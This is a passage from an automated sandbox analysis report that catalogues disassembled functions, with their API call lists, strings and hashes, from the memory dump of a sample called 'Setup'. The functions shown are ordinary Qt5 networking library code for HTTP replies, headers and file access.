                                                                                                                                                              • String ID: -$1abortRequest()$1deleteLater()$1followRedirect()$1haveDataSlot(qint64,QByteArray,bool,qint64)$1httpAuthenticationRequired(QHttpNetworkRequest,QAuthenticator*)$1httpError(QNetworkReply::NetworkError,QString)$1onRedirected(QUrl,int,int)$1proxyAuthenticationRequired(QNetworkProxy,QAuthenticator*)$1readBufferFreed(qint64)$1readBufferSizeChanged(qint64)$1replyDownloadData(QByteArray)$1replyDownloadMetaData(QList<QPair<QByteArray,QByteArray> >, int, QString, bool, QSharedPointer<char>, qint64, qint64, bool)$1replyDownloadProgressSlot(qint64,qint64)$1replyEncrypted()$1replyFinished()$1replyPreSharedKeyAuthenticationRequiredSlot(QSslPreSharedKeyAuthenticator*)$1replySslConfigurationChanged(QSslConfiguration)$1replySslErrors(QList<QSslError>,bool*,QList<QSslError>*)$1resetUploadDataSlot(bool*)$1sentUploadDataSlot(qint64,qint64)$1startRequest()$1startRequestSynchronously()$1uploadByteDeviceReadyReadSlot()$1wantUploadDataSlot(qint64)$2abortHttpRequest()$2authenticationRequired(QHttpNetworkRequest,QAuthenticator*)$2downloadData(QByteArray)$2downloadFinished()$2downloadMetaData(QList<QPair<QByteArray,QByteArray> >, int, QString, bool, QSharedPointer<char>, qint64, qint64, bool)$2downloadProgress(qint64,qint64)$2encrypted()$2error(QNetworkReply::NetworkError,QString)$2finished()$2haveUploadData(qint64,QByteArray,bool,qint64)$2preSharedKeyAuthenticationRequired(QSslPreSharedKeyAuthenticator*)$2processedData(qint64,qint64)$2proxyAuthenticationRequired(QNetworkProxy,QAuthenticator*)$2readBufferFreed(qint64)$2readBufferSizeChanged(qint64)$2readyRead()$2redirectAllowed()$2redirected(QUrl,int,int)$2resetData(bool*)$2sslConfigurationChanged(QSslConfiguration)$2sslErrors(QList<QSslError>,bool*,QList<QSslError>*)$2startHttpRequest()$2startHttpRequestSynchronously()$2wantData(qint64)$No suitable proxy found$QNetworkReply::NetworkError$QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.$QString$Range$_q_error$_q_finished$bytes=$https$preconnect-http$preconnect-https
                                                                                                                                                              • API String ID: 3882774003-554745703
                                                                                                                                                              • Opcode ID: dd807478d720f85624826a8fe8e04cdc0551a79f858b373d29a40f8f946b469c
                                                                                                                                                              • Instruction ID: da6dabf81a21768a3defaed0826f7524b6207bfd5abd1856f2437600d5a23f1b
                                                                                                                                                              • Opcode Fuzzy Hash: dd807478d720f85624826a8fe8e04cdc0551a79f858b373d29a40f8f946b469c
                                                                                                                                                              • Instruction Fuzzy Hash: 0E1383B2A0AA8695EBA2DF35D8542ED3361FF44758F804132DE5E47664EF3CD64ACB00
                                                                                                                                                              Function 00007FFBA19D1AE0 Relevance: 207.2, APIs: 100, Strings: 18, Instructions: 717timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Byte$Array@@$Data@@$String@@$?qstrcmp@@$List$?size@Ref@@$Date$?free_helper@HashNode@1@@Time@@$?data@?end@Char@@$V0@@$Variant@@$?dispose@Data@1@@Hash@@memcmp$?begin@V0@$$$?add?currentEmpty@Int@Lower@Secs@String@@@TimeUtc@V1@_
                                                                                                                                                              • String ID: Cache-Control$connection$content-encoding$content-length$content-range$content-type$expires$keep-alive$last-modified$max-age$no-store$proxy-authenticate$proxy-authorization$set-cookie$trailers$transfer-encoding$upgrade$warning
                                                                                                                                                              • API String ID: 2422210890-3805654870
                                                                                                                                                              • Opcode ID: 12b6f2a41f9f8eb057b07bf23e9cb2a6bb022289403ac4499ad673deb956a344
                                                                                                                                                              • Instruction ID: 73bfb17112d251df3205cdcff009cf22e8e2b893b23d0a9db0ced095be7eca9c
                                                                                                                                                              • Opcode Fuzzy Hash: 12b6f2a41f9f8eb057b07bf23e9cb2a6bb022289403ac4499ad673deb956a344
                                                                                                                                                              • Instruction Fuzzy Hash: 967222B2A0AA4395EB92DF35D8541B96361FF84B98F844032DD5E475A4EF3CE54ACF00
                                                                                                                                                              Function 00007FFBA198D1D0 Relevance: 170.4, APIs: 88, Strings: 9, Instructions: 657COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Generic$Argument@@Return$Object@@$String@@$Url@@$MetaVariant@@$ConnectionQt@@Type@$?invokeArgument@@333333333@Method@$BytePrivate@@$Array@@@Buffer@@Char@@@Connection@DeviceDevice@@Flags@FormattingObject@@@$?arg@?connect?open@?set?size@?translate@Application@@Array@@Base@Char@@ComponentCoreDataData@DecodeDevice@@@@@Flag@Impl@Latin1ModeMutex@@ObjectOpenOption@Option@2@@@@SlotString@String@@@U3@@V0@@malloc
                                                                                                                                                              • String ID: Invalid URI: %1$QNetworkAccessDataBackend$QNetworkReply::NetworkError$downloadProgress$errorOccurred$finished$metaDataChanged$qint64$readyRead
                                                                                                                                                              • API String ID: 2542142892-1981360243
                                                                                                                                                              • Opcode ID: c9e67992ece5033ec4afbdd3a893a400399509114d3e11e2e62667f81e5ea1bd
                                                                                                                                                              • Instruction ID: 88253be1ac08275a965f185e1287877e6fff4b7b301ca532664f31a0e04ca4d1
                                                                                                                                                              • Opcode Fuzzy Hash: c9e67992ece5033ec4afbdd3a893a400399509114d3e11e2e62667f81e5ea1bd
                                                                                                                                                              • Instruction Fuzzy Hash: BA726F26A18ED5D5F7129F38D8552E973B1FF98718F859222DE8D06A24FF38D249CB00
                                                                                                                                                              Function 00007FFBA19E3990 Relevance: 144.1, APIs: 70, Strings: 12, Instructions: 600threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Data@@List$Meta$Generic$Argument@@Return$?begin@Connection@$String@@$ByteConnectionQt@@@Type@$?connect@Array@@Base@@Thread@$?cast@?dispose@?end@?moveDataData@1@@FactoryLoader@@Mutex@@String@@@Thread@@Thread@@@V0@@V2@@$?free?sender@?unlock@Data@1@Map@NodePrivate@@String$?detach@?detach_grow@?index?instance@?invoke?key?lock@?main?next?set?start@ApplicationArgument@@333333333@ArrayCaseCoreDaemonData@EnvironmentExceptionLatin1List@@List_contains@Method@MultiName@Node@ObjectObject@@@Priority@1@@Ptr@@@Qt@@Sensitivity@String@@@@ThrowTree@U1@@Value@@Variablemallocmemmove
                                                                                                                                                              • String ID: 1configurationAdded(QNetworkConfigurationPrivatePointer)$1configurationChanged(QNetworkConfigurationPrivatePointer)$1configurationRemoved(QNetworkConfigurationPrivatePointer)$1updateConfigurations()$2configurationAdded(QNetworkConfigurationPrivatePointer)$2configurationChanged(QNetworkConfigurationPrivatePointer)$2configurationRemoved(QNetworkConfigurationPrivatePointer)$2updateCompleted()$QT_EXCLUDE_GENERIC_BEARER$Unknown exception$generic$initialize
                                                                                                                                                              • API String ID: 289430799-250334310
                                                                                                                                                              • Opcode ID: e604a4aaf2e049d9e2425584b2fe89d7c65323b887598afc5a9a53fe502b2604
                                                                                                                                                              • Instruction ID: 895f8b10bd323ac727da0d8407d29ae208a85c5fc863230166a21522f7b87222
                                                                                                                                                              • Opcode Fuzzy Hash: e604a4aaf2e049d9e2425584b2fe89d7c65323b887598afc5a9a53fe502b2604
                                                                                                                                                              • Instruction Fuzzy Hash: 9A527262A0AA8285EBA2CF35D8582F973A1FF44B58F454132DE5D477A4EF3CD54ACB00
                                                                                                                                                              Function 00007FFBA197EDC0 Relevance: 143.9, APIs: 74, Strings: 8, Instructions: 401timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@$Argument@@GenericReturnVariant@@$FileFormatting$Info@@$ComponentDateFlags@Latin1Option@$Char@@String@@@Time@@$?set?size@Char@@@Object@@Url@@@@@V0@@$?data@?path@Connection@Empty@MetaMode@1@@Option@2@@@@ParsingQt@@@String@Type@V0@$$$?arg@?connect@?const?host@?last?scheme@?translate@?userApplication@@ConnectionCoreData@Dir@File@File@@File@@@Host@Initialization@Int@LocalModified@Name@Path@Time@@@memmove
                                                                                                                                                              • String ID: 1uploadReadyReadSlot()$2readyRead()$Cannot open %1: Path is a directory$Error opening %1: %2$QNetworkAccessFileBackend$localhost$qrc$uploadReadyReadSlot
                                                                                                                                                              • API String ID: 2238512935-1139426471
                                                                                                                                                              • Opcode ID: 73548312622e6472f013ee2d0404b25c44cb3bd599bdfcf3fc6d0962cbb010cd
                                                                                                                                                              • Instruction ID: 3e74edda1c80d6959a20ef8b76cf381f055a2f08fbaa64e63912824331e70f6c
                                                                                                                                                              • Opcode Fuzzy Hash: 73548312622e6472f013ee2d0404b25c44cb3bd599bdfcf3fc6d0962cbb010cd
                                                                                                                                                              • Instruction Fuzzy Hash: 87225162A09A96D5EB62DF38D8542F833B1FF54759F804132DE5E16A64EF3CD24ACB00
                                                                                                                                                              Function 00007FFBA19D7400 Relevance: 140.7, APIs: 75, Strings: 5, Instructions: 702COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA19D743A
                                                                                                                                                              • ?scheme@QUrl@@QEBA?AVQString@@XZ.QT5CORE ref: 00007FFBA19D744B
                                                                                                                                                              • ??8QString@@QEBA_NVQLatin1String@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D747C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D74A0
                                                                                                                                                              • ??0QVariant@@QEAA@HPEBXI@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7582
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D759D
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D75AE
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D75C9
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D75D6
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D75FC
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7609
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7630
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D763A
                                                                                                                                                              • ?toBool@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7648
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7657
                                                                                                                                                              • ?toBool@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7666
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D767B
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7696
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D76A2
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D76CA
                                                                                                                                                                • Part of subcall function 00007FFBA1988450: ?isValid@QVariant@@QEBA_NXZ.QT5CORE(00000000,00000000,preconnect-https,00007FFBA19D502E), ref: 00007FFBA198846E
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D76E5
                                                                                                                                                              • ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D76F1
                                                                                                                                                                • Part of subcall function 00007FFBA1988450: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA198852F
                                                                                                                                                                • Part of subcall function 00007FFBA1988450: ?freeNode@QHashData@@QEAAXPEAX@Z.QT5CORE ref: 00007FFBA198853B
                                                                                                                                                                • Part of subcall function 00007FFBA1988450: ?hasShrunk@QHashData@@QEAAXXZ.QT5CORE ref: 00007FFBA1988552
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D770C
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7751
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D775A
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D776A
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D777A
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D77A7
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D77B5
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D77D7
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D77E7
                                                                                                                                                              • ?toLower@QByteArray@@QEGBA?AV1@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7819
                                                                                                                                                              • ?qstrcmp@@YAHAEBVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7829
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7835
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7846
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7853
                                                                                                                                                              • ?compare@QByteArray@@QEBAHPEBDW4CaseSensitivity@Qt@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D786A
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@D@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D787D
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D788C
                                                                                                                                                              • ??YQByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D78A0
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D78BF
                                                                                                                                                              • ??0QVariant@@QEAA@H@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D78DD
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D78F5
                                                                                                                                                              • ??0QVariant@@QEAA@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7906
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7921
                                                                                                                                                              • ??0QVariant@@QEAA@_J@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7938
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7953
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D79EF
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7A91
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7A9A
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7AB5
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7ACA
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7AEA
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7AF4
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7B23
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7B41
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7B80
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7B8D
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7B9C
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7BA8
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7BB6
                                                                                                                                                              • memcmp.VCRUNTIME140 ref: 00007FFBA19D7BC5
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7C01
                                                                                                                                                              • ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7C3C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,https,?), ref: 00007FFBA19D7CE1
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,https,?), ref: 00007FFBA19D7CEA
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7D05
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7D76
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7E41
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7E4A
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7E65
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7E70
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7E7A
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7F49
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,https), ref: 00007FFBA19D7F53
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Array@@Byte$Data@@$ListString@@$V0@@$?begin@?dispose@?end@?size@Data@1@@HashUrl@@Valid@$?data@Bool@Char@@String@@@$?clear@?compare@?detach@?free?free_helper@?has?qstrcmp@@?scheme@CaseData@1@Empty@Hash@@Latin1Lower@Node@Node@1@@Qt@@@Sensitivity@Shrunk@mallocmemcmp
                                                                                                                                                              • String ID: Cache-Control$https$location$must-revalidate$set-cookie
                                                                                                                                                              • API String ID: 2244422892-2702059892
                                                                                                                                                              • Opcode ID: 8f974c9aacbd744b037d347b21ed6aba936a813b0627429718aec5f13dc6358b
                                                                                                                                                              • Instruction ID: 7e0b21d82940834f2ed568df3fd0ca7f658e963e3786a91a53eac594ea83ac84
                                                                                                                                                              • Opcode Fuzzy Hash: 8f974c9aacbd744b037d347b21ed6aba936a813b0627429718aec5f13dc6358b
                                                                                                                                                              • Instruction Fuzzy Hash: 22726EB2A0AA4286EB96DF35D8542FC2361FB44B9CF444032DE5E476A5EF3CD54ACB40
                                                                                                                                                              Function 00007FFBA19D8260 Relevance: 128.3, APIs: 63, Strings: 10, Instructions: 580windowtimeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
